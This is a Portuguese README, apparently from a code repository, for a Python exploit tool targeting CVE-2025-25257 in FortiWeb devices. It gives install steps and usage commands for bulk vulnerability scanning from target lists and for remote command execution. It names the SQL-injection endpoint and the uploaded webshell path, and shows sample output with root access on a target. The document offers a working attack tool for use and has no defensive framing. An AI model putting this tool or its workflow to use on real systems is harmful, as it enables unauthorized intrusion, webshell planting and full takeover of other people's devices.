
Ferramenta de exploração baseada em Python para CVE-2025-25257 no FortiWeb. Automatiza a detecção de injeção SQL, upload de webshell e execução remota de comandos em alvos vulneráveis.
Uma ferramenta baseada em Python para verificar e explorar a vulnerabilidade CVE-2025-25257 em dispositivos FortiWeb. Esta vulnerabilidade permite injeção de SQL e execução remota de código através de um cabeçalho Authorization manipulado.
CVE-2025-25257 é uma vulnerabilidade crítica em dispositivos FortiWeb que permite:
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)Verificar um único alvo:
python3 vuln_check.py -t https://target.com
Verificar múltiplos alvos a partir de um arquivo:
python3 vuln_check.py -l target.txt
exp.py)Execute comandos em um alvo vulnerável:
python3 exp.py -t https://target.com -c "id"
vuln_check.py - Verificador e exploit principal de vulnerabilidadeexp.py - Ferramenta de execução de comandos para alvos vulneráveistarget.txt - Lista de exemplo de alvos (substitua pelos seus)vuln.txt - Arquivo de saída com alvos vulneráveis (gerado após a varredura)/api/fabric/device/status/cgi-bin/x.cgiA ferramenta gera um arquivo vuln.txt contendo:
Exemplo de saída:
# CVE-2025-25257 Vulnerable Targets - 2025-01-27 10:30:15
# Format: [timestamp] target - command_output
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
créditos:0xbigshaq